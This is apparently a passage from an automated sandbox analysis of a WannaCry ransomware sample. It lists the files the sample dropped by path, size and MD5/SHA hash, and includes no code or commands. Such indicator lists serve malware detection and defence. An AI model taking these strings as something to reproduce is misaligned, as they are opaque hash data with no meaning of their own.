SHA512163e2545ba65ce80c3071235bfdf65368b4c602837bf7e134aa188094db393c34490ed81faff58a8b8d7c485695f191e2dec850dc49ca4a0a5016db7b05dbcee
-
Filesize
169KB
MD577944f96068a26ce10286d2085529515
SHA12b8f26f4541ba13ddfc373d112ece8a0e64c37c7
SHA256b4ae699b19b7257605680dbd61127707444695e1207c2edc3213f597729cba1a
SHA5123e6e92f9f140c9711788f1e6dfc473aa59c40ab31da87b398f6f8eb00dad2902c02e3c3f686a15668297bda5d5f3b3aff8ccd7dc0b1eba5d28b7a2d6bbb5095d
-
Filesize
10.1MB
MD5c8ebfcfd8c7a69e30d45b4498ece29d0
SHA18601203764578ff3f3d853dc56c4c6093dad535e
SHA256620a4b11fb37ab997950870b06fee3038c5922a052e06871b9c1a7e1a19c1262
SHA5126ae4d77cd1758d2b738e794e6661cd9c8a984007386ea4c902f03f11a01f8da691c77614b66648f8a67c02560743fd29cc5a834adadc3e08dcdb7a0932db75d2
-
Filesize
50KB
MD538b03b1d2cf2ec0882bdc35b75bad949
SHA1cff00dbc2a4f0b2265f462d94a8d5a484ec04dfa
SHA2560ad8892c72e216a4c12793dd6045e3e88413b42716c2020ddb0cce3266d12cb2
SHA512d1ab7306313e3009a270aebc839c3f5532107ab85ca975e4d4fe509ff86f59ba04e7909ddade0872900b9aa1c3e989187d4a9bb37ed5a1560554bfb98d990792
-
Filesize
41KB
MD56f1dae472a14ae8466bef121470c2e14
SHA1d62ff33d7b34a5e99f3e8038b3d491b9587e6c78
SHA2561048754b003ec6e9815e1fe328901c0d952c4babc997ca5bc4c4085fcd4b2377
SHA5120d3d3982943fbc54f37546ba17c1068d6fdee4417ad00b6a4b055985bf8c72bab7a7e63918b3e27186ecde19734695824c585b26fde3b22a6279b30cd2799cd6
-
Filesize
15KB
MD525087ef7b75cd416efdefe229d735c51
SHA127d3d2ac34de956a41987aaf769d8e4dd9915788
SHA25609cac9c6839cb028c2a05aa3407fc64756f245a6cafcd372debf411b82f722e8
SHA512f6bad76d5ae10382a42b917ac3fa0708ed9d25155c12a4be91fd51e2d07403cffc835b66e0234c0a38e62581087b4bc795d16599db07acec1b98f401a5226054
-
Filesize
15KB
MD55cab51a6a205eb3b3fa232bd4e8e6cf5
SHA1648a512d44063d6ff5285054c5c795abc29e213c
SHA256fb1faa1f70491e085d7ef0a27ad789126d8f3662c121d091eeec52eeb3e0313a
SHA5121ec0afe7d6ccf8e5754987b60f7cd90e9e2cf4a2f0f549c707ebe296c2385f5aea5cf3fd59a15beb93267c65c8d9e9c930a5a07d5386ca1df892c8b3ae0974a7
-
Filesize
78KB
MD5e546c2554286bd698fb80751692f1dff
SHA15ae28e9deadc4a99a506e838521862e4cb6fb997
SHA25633437c83104c63f8178a5c737d2600082a129813b405d0262e5312a453e09121
SHA5127bc78387eb89fd6e9cc88ac908f8b996c4b35ffde4ca029bd6eb95eac1711af06a63848d0724b96f7a22a483e680ce81283313c8655c554e8e2a0939c3b47848
-
Filesize
33KB
MD564a780afe42da01052f1844e4a33cb2d
SHA19b487e249e30b120026e8994a420d89fd9091799
SHA25610f481bf9bce9318a79d5dc5bd17e19908b5ed419062c70a1a7e400992d8da86
SHA5120a277cb89598262d62b90fd994be478e9ed7d4b25c95fa06885393b730ef1a59443aea89f0c3fdd370a90c41cd2b0f7cffacb3d80619c016c2910364d14364f3
-
Filesize
91KB
MD5a1ba93a916b3078e8b640807c07ce1e7
SHA101f88dccdb8d44d2b0a160ce038ff970aa799aeb
SHA2564135754b26dfac10cd19dcf6e03677b537244cf69fdce9c4138589e59449b443
SHA5123c62713d2e83144e82c644a752b77ddac4652542b11416eea8289209dfa783aac54ae347ec80d55260a11f10c7829a91021e55d05af04f2404a0f19354b91431
-
Filesize
1.4MB
MD592795535f2855d02685a78985d2f3d28
SHA146b3963b46086e370598194c428cb2d7dca36e27
SHA2567399b0efe5b3d0a9656f35a7317c9210dfda4374fbba7b2fd07671a5855a9345
SHA512151a8f8bbe56ef7f5a2490dd9c17990214ada7574e8db43c4f0171d2d02f36238010276d8214bbcedca4fb627dfb4aa0a7d75b42cb3a3d99e1fb003e3e04cd59
-
Filesize
4.9MB
MD5cbb2f646b9b2a67dad68c35bbc7cb7c8
SHA1e8b79e2ddb8b8394f89489745a6e2a8ddf40622d
SHA256c6e05a6d8433f111916f2b107b765a9159f41fa1c7a5d8e267645dbd6734d737
SHA5127019fa6ee9e597f39c6b3976261cca80d3ca1e853a4821b30a3ff0bc871a258551570d136fd5b76a9d2ef3224118812bd3a790bc85710482d9fa34f96f4c87d5
-
Filesize
369KB
MD5a4431266f13f98d48a2f2b10fd2d8a71
SHA1950887332a47091ab9102f3fa3cfeeee756734d3
SHA25688945e1fd1b63c3d941f67e6cf161680f1288c97fb7ac6028d2645477708f124
SHA51297f5f2a44ffda2bb148ee54aeeb72a246ecf9bc03b48561826bf6a1c8fc6accb5177c8ecfe8f10b93b0bb35f1fc9cc250dc3a0c99a30f1f70b7f19338f6c193b
-
Filesize
384KB
MD504aebb8b06cbfa10de7225f2ae76f98f
SHA141de2e10ec2f2a6b2c19c08e8e82eebbf4f47846
SHA256bfc1c6dd5eed11e15882a3d9e85c63a942a10f81c82d21bb0e7a190ba2d49a91
SHA5125e8e74940793438672a91e5e9489b1e0a20fc26d094c5f636be561f5d28e00cc04a81a9443e7b97cc68bd00de0951b92f9f867293747f5d9b7d7113d9dd664a4
-
C:\Users\Admin\Desktop\RANSOMWARE-WANNACRY-2.0-master\@[email protected]
Filesize1KB
MD555532be98ad15ee7f74bd48c3ef5b862
SHA1779786366eea8ecc791fd67eade54eefa7a8bf90
SHA25635ecf4e4d6581214bf1cae91a6a747580ac700aed28b701b35029e139e05f980
SHA512c542f057a6e2415b2006a733ddf9445c0e1e6e6a2163899900d6d9edc5f2f4d5cacbaf5475620cb0919e6a02fb7cdf75a2e0704d0ca5565f6eb88d22345e0777
-
Filesize
3.3MB
MD5017f199a7a5f1e090e10bbd3e9c885ca
SHA14e545b77d1be2445b2f0163ab2d6f2f01ec4ca05
SHA256761e037ee186880d5f7d1f112b839818056f160a9ba60c7fb8d23d926ac0621f
SHA51276215a26588204247027dcfdab4ea583443b2b2873ff92ad7dd5e9a9037c77d20ab4e471b8dd83e642d8481f53dbc0f83f993548dc7d151dead48dc29c1fdc22
-
Filesize
1.8MB
MD550515f156ae516461e28dd453230d448
SHA13209574e09ec235b2613570e6d7d8d5058a64971
SHA256f4afba646166999d6090b5beddde546450262dc595dddeb62132da70f70d14ca
SHA51214593ca96d416a2fbb6bbbf8adec51978e6c0fb513882d5442ab5876e28dd79be14ca9dd77acff2d3d329cb7733f7e969e784c57e1f414d00f3c7b9d581638e5
-
Filesize
7B
MD54047530ecbc0170039e76fe1657bdb01
SHA132db7d5e662ebccdd1d71de285f907e3a1c68ac5
SHA25682254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750
SHA5128f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e
-
Filesize
4.4MB
MD57399ebe1e1b9c99f3cb4a2521d424384
SHA17a560782421feb72b1e84f162cf0abd0809fda28
SHA2564704846c5605552a2573aeb62f176630fd2ba5498457420c3fb36a27cae6800f
SHA51280b6b5b2a93656211073560e3eb93063edec44d54a4346b64cab5898162936d3109e7d213d73a93e50ce3a20d163ce6f8eb27e3f31e72bae6c684e528413981d
-
C:\Users\Default\Desktop\@[email protected]
Filesize1.4MB
MD5c17170262312f3be7027bc2ca825bf0c
SHA1f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c